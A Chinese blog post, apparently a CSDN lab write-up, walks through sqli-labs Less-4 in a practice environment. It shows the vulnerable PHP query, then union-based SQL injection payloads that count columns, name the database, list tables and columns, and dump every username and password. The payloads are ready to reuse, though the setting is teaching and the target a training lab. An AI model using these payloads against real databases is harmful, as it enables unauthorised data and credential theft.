sqlilabs_4

本文通过sqlilabs的案例展示了SQL注入的过程,包括判断列数、确定数据库名、获取表名、揭示列名以及提取特定列的值。通过GET参数?id进行注入,成功获取了users表中username和password列的所有值。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看源代码:

if(isset($_GET['id']))

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

if($row)

{echo 'Your Login name:'. $row['username'];

 echo 'Your Password:' .$row['password'];}

else 

{print_r(mysqli_error($con));}

输入形式为GET,注入格式为?id=1") and 1=1 --+且当正确时会显示Your Login name:和Your Password:,错误时不会显示任何东西

列数:

?id=1") order by 1 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 2 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 3 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 4 --+

Unknown column '4' in 'order clause'

即列数为3

数据显示位置:

?id=0") union select 1,2,3 --+

Your Login name:2

Your Password:3

目前使用库名:

?id=0") union select 1,database(),3 --+

Your Login name:security

Your Password:3

即目前库名为security

security库中的所有表名:

?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

Your Login name:2

Your Password:emails,referers,uagents,users

即security库中有emails,referers,uagents,users共4个表

users表中的所有列名:

?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Your Login name:2

Your Password:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

即users表中有USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password共6个列

username列中的所有值:

?id=0") union select 1,group_concat(username),3 from users --+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5

Your Password:3

即username列中有Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5共14个值

password列中的所有值:

?id=0") union select 1,2,group_concat(password) from users --+

Your Login name:2

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5

即password列中有Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5共14个值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值